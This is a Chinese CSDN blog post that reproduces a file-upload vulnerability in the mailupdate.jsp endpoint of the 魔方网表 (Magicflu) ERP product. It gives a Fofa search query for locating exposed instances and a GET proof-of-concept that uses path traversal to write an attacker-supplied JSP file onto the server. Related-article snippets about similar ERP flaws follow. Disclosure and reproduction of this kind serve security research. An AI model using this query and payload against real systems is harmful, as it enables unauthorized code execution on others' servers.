【漏洞复现】魔方网表ERP产品mailupdat文件上传漏洞

最新推荐文章于 2024-08-29 09:09:11 发布

晚风不及你ღ

最新推荐文章于 2024-08-29 09:09:11 发布

阅读量348

点赞数

文章标签： web安全

本文链接：https://blog.csdn.net/qq_37113223/article/details/138176464

版权

【漏洞复现】专栏收录该内容

146 篇文章 1 订阅

已下架不支持订阅

本文介绍了魔方网表ERP产品中的mailupdate文件上传漏洞，该漏洞可能导致服务器权限被攻击者获取。通过Fofa搜索语法可发现相关问题，漏洞复现包括了漏洞POC和访问URL的拼接。

摘要由CSDN通过智能技术生成

漏洞描述：

魔方网表帮助其搭建了支持信创环境的端到端的一站式数据智能填报系统,实现数据收集模板个性化定义,收集任务集中管控,结构化数据存储、分析及呈现等功能。

魔方网表ERP产品mailupdate存在文件上传漏洞，攻击者可利用漏洞获取服务器权限。

搜索语法:

Fofa-Query: icon_hash="694014318"

漏洞详情：

1.魔方网表ERP产品。

2.漏洞POC：

GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test404.jsp&messagecontent=%3C%25%20out.println%28%22Hello%20World%21%22%29%3Bnew%20java.io.File%28application.getRealPath%28request.getServletPath%28%29%29%29

了解本专栏

已下架不支持订阅

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

晚风不及你ღ

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
【漏洞复现】魔方网表ERP产品mailupdat文件上传漏洞

魔方网表ERP产品mailupdate存在文件上传漏洞，攻击者可利用漏洞获取服务器权限。
复制链接

扫一扫

专栏目录

已下架不支持订阅

魔方网表ERP mailupdate.jsp 任意文件上传漏洞复现

0xSec

04-12

995

魔方网表ERP mailupdate.jsp 接口存在文件上传漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。

【漏洞复现】魔方网表mailupdate.jsp接口存在任意文件上传漏洞

失心少年

04-18

208

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习，禁止用于其他！漏洞链接：http://127.0.0.1/magicflu/html/mail/mailupdate.jsp?

参与评论您还未登录，请先登录后发表或查看评论

漏洞挖掘姿势之-魔方网表 magicflue 任意文件上传漏洞

Grace_for_it的博客

05-08

711

魔方网表 magicflue 任意文件上传漏洞

魔方网表存在 mailupdate.jsp接口任意文件上传漏洞

wan___she__pi的博客

04-17

663

魔方网表mailupdate.jsp接口存在任意文件上传漏洞。

ERP 管理软件系统存在任意文件读取漏洞

weixin_68647219的博客

08-01

3884

ERP 管理软件系统任意文件读取高危漏洞，该漏洞是由于对用户查看或下载的文件不做限制，可能导致读取配置信息甚至系统重要文件。严重的话，就可能导致SSRF，进而漫游至内网。

【漏洞复现】明源云ERP系统接口管家-ApiUpdate-任意文件上传(QVD-2023-20382)

知黑而守白

01-29

546

明源云接口管家是明源云ERP提供的一个功能，用于管理和处理系统与外部系统之间的接口集成。它充当了ERP系统与其他应用程序、第三方系统或服务之间的桥梁，负责数据的传输、交换和同步。明源云接口管家 ApiUpdate 接口存在任意文件上传漏洞，使攻击者能够上传包含恶意代码的文件到系统。通过成功利用该漏洞，攻击者可能执行恶意代码、伪装身份、覆盖合法文件，甚至导致拒绝服务情况。

某物业ERP系统AreaAvatarDownLoad任意文件读取漏洞复现 [附POC]

薛定谔嘚喵博客

07-23

154

某物业ERP系统AreaAvatarDownLoad.aspx接口处存在任意文件读取漏洞，未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件，造成信息泄露，导致系统处于极不安全的状态。

汇智ERP Upload.aspx 文件上传致RCE漏洞复现

0xSec

08-22

389

汇智ERP Upload.aspx 接口处任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。

weixin_43167326的博客

04-02

643

U8 cloud 聚焦成长型、创新型企业的云 ERP，基于全新的企业互联网应用设计理念，为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案，全面支持多组织业务协同、智能财务，人力服务、构建产业链智造平台，融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞。

用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)

qq_39894062的博客

04-20

803

挖洞手记——软媒魔方可信任程序执行漏洞

weixin_30808575的博客

11-29

102

用软媒魔方给笔记本换系统找到的。版本号：软媒魔方6.1.3.0正式版漏洞触发：在C盘创建一个program.exe，打开软媒魔方，该程序会先执行该program.exe，点击应用大全中的软件也能触发。漏洞利用：可用来开机启动加载恶意程序、木马。转载于:https://www.cnblogs.com/blogg/p/5004353.html...

【网络安全】服务基础第一阶段——第二节：Windows系统管理基础----虚拟化IP地址以及用户与组管理

goldfish8848的博客

08-25

1414

不同的用户身份拥有不同的权限，每个用户包含一个名称和一个密码，用户账户拥有唯一的安全标识Windows系统中，每个用户账户都有一个独特的安全标识符（SID，Security Identifier）它在系统内部用于控制对各种资源的访问权限。我们可以通过不同的方法查看用户的SID：1.使用命令提示符（CMD）这里的CMD就是我们常用的命令提示符（类似于终端的那个窗口），输入命令来查看当前登陆用户的SID如果需要查看特定用户的SID，可以使用命令。

网络安全（黑客）——自学2024

2401_84466325的博客

08-25

1169

网络安全是一种综合性的概念，涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。

人工智能在网络安全领域的应用探索